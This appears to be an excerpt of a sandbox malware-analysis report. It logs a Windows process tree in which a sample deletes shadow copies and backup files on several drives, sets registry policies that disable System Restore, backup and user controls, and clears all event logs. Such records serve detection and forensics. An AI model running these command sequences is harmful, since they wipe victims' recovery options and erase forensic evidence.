C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵PID:4656
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4380 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵PID:60
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1676 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵PID:3520
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1008 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵PID:4556
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1768 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet2⤵PID:3132
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3376 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win2⤵PID:4228
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win2⤵PID:3100
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win2⤵PID:2104
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win2⤵PID:960
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win2⤵PID:2356
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win2⤵PID:2112
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del %02⤵PID:4572
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s hrmlog22⤵PID:3816
-
C:\Windows\system32\attrib.exeattrib +h +s hrmlog23⤵
- Views/modifies file attributes
PID:268 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog22⤵PID:284
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\hrmlog23⤵
- Views/modifies file attributes
PID:4536 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f2⤵PID:2460
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f3⤵PID:3324
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f2⤵PID:768
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f3⤵PID:3660
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f2⤵PID:3748
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f3⤵PID:3736
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f2⤵PID:4328
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f3⤵PID:4504
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f2⤵PID:4840
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f3⤵PID:4160
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f2⤵PID:4040
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f3⤵PID:2344
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f2⤵PID:1504
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f3⤵PID:1724
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f2⤵PID:932
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f3⤵PID:2624
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f2⤵PID:2496
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f3⤵PID:3500
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f2⤵PID:4212
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f3⤵PID:4668
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f2⤵PID:772
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f3⤵PID:4320
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f2⤵PID:3996
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f3⤵PID:4368
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f2⤵PID:3708
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f3⤵PID:4964
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f2⤵PID:1944
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f3⤵PID:3916
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f2⤵PID:1512
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f3⤵PID:5064
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f2⤵PID:1488
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f3⤵PID:4064
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f2⤵PID:4800
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f3⤵PID:2196
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f2⤵PID:2980
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f3⤵PID:4460
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵PID:624
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f3⤵PID:4336
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f2⤵PID:1612
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f3⤵PID:4144
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f2⤵PID:5044
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToNetwork /t REG_DWORD /d 1 /f3⤵PID:1464
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f2⤵PID:3832
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f3⤵PID:1244
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f2⤵PID:4032
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵PID:3968
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f2⤵PID:872
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵PID:3184
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f2⤵PID:4852
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵PID:3936
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f2⤵PID:1152
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵PID:552
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f2⤵PID:1324
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵PID:5108
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f2⤵PID:3460
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵PID:2248
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f2⤵PID:1496
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵PID:2556
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f2⤵PID:1248
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵PID:5060
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f2⤵PID:2928
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f3⤵PID:428
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f2⤵PID:2972
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵PID:488
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"2⤵PID:2480
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe el3⤵PID:4016
-
C:\Windows\system32\wevtutil.exewevtutil.exe el4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1576 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "AMSI/Debug"3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2868 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "AirSpaceChannel"3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1476 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Analytic"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3340 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Application"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:880 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowFilterGraph"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3388 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowPluginControl"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4544 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Els_Hyphenation/Analytic"3⤵PID:2984
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "EndpointMapper"3⤵PID:3676
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "FirstUXPerf-Analytic"3⤵PID:812
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "ForwardedEvents"3⤵
- Clears Windows event logs
PID:4380 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "General Logging"3⤵PID:4656
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "HardwareEvents"3⤵PID:2724
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "IHM_DebugChannel"3⤵PID:3760
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"3⤵
- Clears Windows event logs
PID:4264 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"3⤵PID:4576
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"3⤵
- Clears Windows event logs
PID:2024 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"3⤵
- Clears Windows event logs
PID:1276 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"3⤵PID:1768
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"3⤵
- Clears Windows event logs
PID:4556 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Internet Explorer"3⤵PID:344
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Key Management Service"3⤵PID:1712
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationDeviceMFT"3⤵PID:544
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationDeviceProxy"3⤵
- Clears Windows event logs
PID:4472 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationFrameServer"3⤵PID:2500
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MedaFoundationVideoProc"3⤵PID:3452
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MedaFoundationVideoProcD3D"3⤵
- Clears Windows event logs
PID:4604 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationAsyncWrapper"3⤵PID:2812
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationContentProtection"3⤵PID:4624
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationDS"3⤵
- Clears Windows event logs
PID:5012 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationDeviceProxy"3⤵PID:268
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationMP4"3⤵PID:3816
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationMediaEngine"3⤵PID:4536
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPerformance"3⤵PID:284
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPerformanceCore"3⤵PID:3140
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPipeline"3⤵PID:4992
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPlatform"3⤵
- Clears Windows event logs
PID:4888 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationSrcPrefetch"3⤵PID:1140
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"3⤵PID:8
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Admin"3⤵PID:1764
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Debug"3⤵
- Clears Windows event logs
PID:740 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Operational"3⤵
- Clears Windows event logs
PID:5084 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"3⤵
- Clears Windows event logs
PID:1876 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"3⤵PID:3392
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"3⤵PID:1784
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"3⤵PID:3024
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"3⤵PID:3664
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IE/Diagnostic"3⤵PID:728
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"3⤵PID:3696
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"3⤵PID:4088
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"3⤵PID:1820
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"3⤵PID:4196
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"3⤵PID:4668
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"3⤵PID:4212
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"3⤵PID:4320
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"3⤵
- Clears Windows event logs
PID:772 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"3⤵PID:4368
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"3⤵
- Clears Windows event logs
PID:3996 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"3⤵PID:4964
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"3⤵PID:3708
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"3⤵PID:3916
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"3⤵PID:1944
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"3⤵PID:5064
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AAD/Analytic"3⤵PID:1512
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AAD/Operational"3⤵PID:4064
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ADSI/Debug"3⤵PID:1488
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ASN1/Operational"3⤵PID:2196
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/General"3⤵PID:4800
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"3⤵
- Clears Windows event logs
PID:4460 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"3⤵
- Clears Windows event logs
PID:2980 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"3⤵PID:4336
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"3⤵PID:624
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"3⤵PID:4144
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppHost/Admin"3⤵PID:1612
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"3⤵
- Clears Windows event logs
PID:1464 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"3⤵PID:5044
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppHost/Internal"3⤵
- Clears Windows event logs
PID:1244 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppID/Operational"3⤵PID:3832
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"3⤵
- Clears Windows event logs
PID:3568 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"3⤵
- Clears Windows event logs
PID:3968 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"3⤵PID:4032
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"3⤵PID:3184
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"3⤵
- Clears Windows event logs
PID:872 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"3⤵PID:3936
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"3⤵PID:4852
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"3⤵PID:552
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"3⤵PID:1152
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"3⤵PID:5108
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"3⤵PID:1324
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"3⤵PID:2248
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"3⤵PID:3460
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppSruProv"3⤵PID:2556
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"3⤵
- Clears Windows event logs
PID:1496 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"3⤵PID:5060
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"3⤵PID:1248
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"3⤵PID:428
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"3⤵PID:2928
-
